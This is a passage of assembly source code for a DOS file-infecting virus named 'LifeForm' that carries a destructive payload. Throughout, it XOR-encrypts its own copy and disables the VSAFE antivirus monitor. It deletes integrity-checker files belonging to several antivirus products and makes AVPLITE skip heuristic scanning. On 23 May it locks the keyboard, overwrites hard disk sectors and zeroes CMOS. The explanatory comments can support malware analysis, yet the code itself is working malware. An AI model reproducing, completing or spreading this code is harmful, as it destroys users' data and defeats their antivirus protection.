mov dx,word ptr ds:[old_date] ;Restore file date
mov ax,5700h
inc ax ;AX = 5701h
int 03h
ret
Res_Time&Lenght:
push ax
sub ax,06h ;Lseek 06 bytes before
mov word ptr es:[di+15h],ax ;end
mov ah,3fh
mov cx,2 ;Read original TIME
mov dx,offset ds:[Old_Time] ;Save it
int 03h
pop ax ;File length
sub ax,Size_SB ;Sub virus size
mov word ptr es:[di+15h],ax ;Lseek to end of
mov ah,3fh ;real file
inc ah
xor cx,cx
int 03h ;Remove the virus (zero-length write = truncate)
ret
;*****************************************************************************
; RUTINE TO COPY AND ENCRYPT THE VIRUS *
;*****************************************************************************
;-----------------------------------------------------------------------
; Copy&Crypt: copy the resident image (ds=cs, from offset 0) into Buffer,
; then XOR the [Crypt_Start,Crypt_End) part of that copy with the key in
; Clave. The original image stays in clear; only the copy is encrypted.
; In:    ds = es = cs, Clave = key
; Clobb: ax, cx, dx, si, di, flags
;-----------------------------------------------------------------------
Copy&Crypt:
xor si,si ;Copy virus to buffer
mov di,offset Buffer
mov cx,Size_SB/2+1 ;Virus size
repe movsw
mov si,(offset Buffer+(Crypt_Start-LifeForm_Start)) ;Our Buffer
mov di,si
mov cx,Crypt_size/2+1 ;Virus size
mov dx,word ptr cs:[Clave] ;Key
Encrypt:
xor word ptr [di],dx ;Encrypts the copy
movsw ;Advances si and di together (copies the word onto itself)
loop Encrypt
ret
;*****************************************************************************
; RUTINE TO CALL INT_21h *
;*****************************************************************************
;-----------------------------------------------------------------------
; Call_Int21h: target of the redirected INT 03h. Forwards to the original
; INT 21h handler and returns with the callee's flags (retf 2).
;-----------------------------------------------------------------------
Call_Int21h:
pushf
call DWORD PTR cs:[OldInt21h] ;Call Int 21h
retf 02h
;*****************************************************************************
; FUCK VSAFE ANTIVIRUS *
;*****************************************************************************
;-----------------------------------------------------------------------
; Vsafe_OFF / Vsafe_ON: VSAFE resident-monitor control API (AX=0FA02h,
; DX=5945h, BL=new flags, issued through INT 03h). OFF clears all flags
; and keeps the previous ones (returned in CL) in VShit; ON restores them
; with bit 2 cleared.
; Clobb: ax, flags (bx, cx, dx preserved)
;-----------------------------------------------------------------------
Vsafe_OFF:
push bx cx dx
mov ax,0fa02h ;Turn off VSAFE's flags
mov dx,5945h
mov bl,00000000b ;New flags :-)
int 03h
mov byte ptr cs:[VShit],cl ;Save flags.
pop dx cx bx
ret
Vsafe_ON:
push bx cx dx
mov ax,0fa02h
mov dx,5945h ;Restore VSAFE's flags
mov bl,byte ptr cs:[VShit]
and bl,11111011b ;Turn off write-protected
int 03h ;flag (cache stuff)
pop dx cx bx
ret
;*****************************************************************************
; DISABLE/ENABLE KEYBOARD *
;*****************************************************************************
;-----------------------------------------------------------------------
; Disable_KB / Enable_KB: mask/unmask IRQ1 (bit 1) in the master PIC
; interrupt mask register (port 21h), so no keystroke can interrupt the
; infection or payload.
; Clobb: al
;-----------------------------------------------------------------------
Disable_KB:
in al,21h
or al,00000010b
out 21h,al ;Disable KeyBoard
ret
Enable_KB:
in al,21h ;Enable KeyBoard
and al,not 2
out 21h,al
ret
;*****************************************************************************
; DELETE CRC FILES *
;*****************************************************************************
;-----------------------------------------------------------------------
; Delete_crc: reached from check_names on every AX=4B00h exec.
; Gets the date (AH=2Ah); DX=0517h (month 5, day 23h=23) triggers PAYLOAD.
; Otherwise, for each of the six integrity-checker filenames below, the
; attributes are cleared (AX=4301h, CX=0) and the file is deleted
; (AH=41h) in the current directory, all through INT 03h.
; The disappearance of these files on program start is itself an
; observable indicator.
;-----------------------------------------------------------------------
Delete_crc:
call push_all
call Set_Int03h ;Set new Int24h & 03h
call Set_Int24h
call Vsafe_Off
Check_Date:
mov ah,2bh ;Get Date
dec ah ;AH = 2Ah
int 03h
cmp dx,0517h ;23th May ?
jne Delete_CONT
call Rest_Int24h
call Rest_Int03h ;Restore Int24h & 03h
call pop_all
jmp PAYLOAD ;Go to PAYLOAD !!
Delete_CONT:
push cs
pop ds
xor cx,cx ;New attribute = 0 for AX=4301h
lea dx,kill_msav ;Chklist.ms
call kill_crc_files
lea dx,kill_tbav
call kill_crc_files
lea dx,kill_smartchk ;Smartchk.cps
call kill_crc_files
lea dx,kill_avp ;Avp.crc
call kill_crc_files
lea dx,kill_ivb ;Ivb.ntz
call kill_crc_files
lea dx,kill_chklist ;Chklist.tav
call kill_crc_files
Exit_Delete:
call Vsafe_ON
call Rest_Int24h
call Rest_Int03h ;Restore Int24h & 03h
call pop_all
jmp ExitInt21h
; kill_crc_files: ds:dx = ASCIIZ name, cx = attributes to set.
kill_crc_files:
mov ax,4300h ;Clear Atributes
inc ax ;AX = 4301h (set attributes)
int 03h
mov ah,41h ;Delete File
int 03h
retn
;*****************************************************************************
; DATA ABOUT ANTI-ANTIVIRUS *
;*****************************************************************************
; Names of antivirus (matched backwards by check_names: the 7 after the
; string is its length, read from AV_scanner-1)
found_avplite db 'AVPLITE',7 ;AntiVirusPro
Av_Scanner:
; CRC files to delete! (ASCIIZ, used by Delete_crc)
kill_tbav db 'ANTI-VIR.DAT',0
kill_msav db 'CHKLIST.MS',0
kill_smartchk db 'SMARTCHK.CPS',0
kill_avp db 'AVP.CRC',0
kill_ivb db 'IVB.NTZ',0
kill_chklist db 'CHKLIST.TAV',0
; Parameters to ADD on the command line! (4 bytes; check_names copies 9,
; so the copy runs on into the bytes that follow)
avplite_cmd db ' /h',0dh ;Skip heuristic scan
;*****************************************************************************
; !! ACTIVATION ROUTINE !! *
;*****************************************************************************
;-----------------------------------------------------------------------
; PAYLOAD (23 May): keyboard masked, screen cleared (mode 2), three
; strings printed with INT 10h AH=13h, then destructive loops:
; Rip_hd writes 17 sectors (AX=0311h) of whatever is at 5000:0000 over
; drive 80h, heads 0..3, tracks 0..68h; kill_cmos then zeroes CMOS
; registers by index through ports 70h/71h; finally spins forever.
;-----------------------------------------------------------------------
PAYLOAD:
call Disable_KB
mov ax,0002h ;Clear Screen
int 10h
call push_all
push cs cs
pop ds es
PREP_VIDEO:
mov ah,13h ;Set values
mov al,0
mov bh,0
mov bl,14
mov cx,45
mov dh,8 ;Line
mov dl,14 ;Position
lea bp,MENSAJE
int 10h ;Print messagge
mov bl,0fh
mov cx,52
mov dh,12
mov dl,10
lea bp,MENSAJE2 ;Messagge
int 10h ;Print messagge
mov cx,57
inc dh
lea bp,MENSAJE3 ;Messagge
int 10h ;Print messagge
call pop_all
;*****************************************************************************
; DESTROY THE HARDDISK *
;*****************************************************************************
Rip_hd:
xor dx, dx ;Clear dx (head 0)
Rip_hd1:
mov cx, 1 ;Track 0, sector 1
mov ax,5000h
mov bx,0311h
xchg ax,bx ;ax = 0311h (write 17 sectors), bx = 5000h
mov dl,80h ;First hard disk
mov es,bx ;es:bx = 5000:5000h source buffer (arbitrary memory)
int 13h ;Kill 17 sectors
jae rip_hd2
xor ah, ah
int 13h ;Reset disks if needed
Rip_hd2:
inc dh ;Increment head number
cmp dh, 4 ;If head number is below 4
jb rip_hd1 ;then go kill another 17
inc ch ;sectors increase track
cmp ch,69h ;number ... 69 tracks ?
jb rip_hd
kill_cmos1:
mov bp,7C00h
mov cx,29Ah ;Hello Dudes !
kill_cmos2:
mov al,cl ;CMOS register index (low byte of counter)
out 70h,al ;CMOS !!
xor al,al
out 71h,al ;Overwrite CMOS
loop kill_cmos2
jmp $ ;I love this ;)
MENSAJE DB 'ƒƒ [LifeForm] coded by ThE_WiZArD (1998) ƒƒ'
MENSAJE2 DB 'Cooler than a body on ice, Hotter than a rollin`dice'
MENSAJE3 DB 'Wilder than a drunken fight ... You`re gonna burn tonight'
Clave dw 0 ;Current XOR key (from port 40h)
Today db 0 ;Not referenced by the code above
Vshit db 0 ;Saved VSAFE flags
Jump_address db 0E9h,90h,90h,01h ;JMP Address (E9 rel16 patched at offset +1, 4th byte filler)
Crypt_end label byte ;End of the encrypted region; everything below stays in clear
DoNothing dw 0
Old_date dw 0 ;File date
Old_time dw 0 ;File time
Org_time dw 0 ;Original time; lands 6 bytes before the end of an infected file
HEADER db 0CDh,020h,90h,01h ;Original 4 bytes; the last 4 bytes of an infected file
Size_Sin_Buffer:
; Buffer is the encryption staging area; it lives only in the resident copy
; (Size_SB excludes it) and is sized to hold everything before itself.
Buffer db (offset Buffer-offset LifeForm_Start) dup (0)
LifeForm_end label byte
LifeForm ends
end LifeForm_start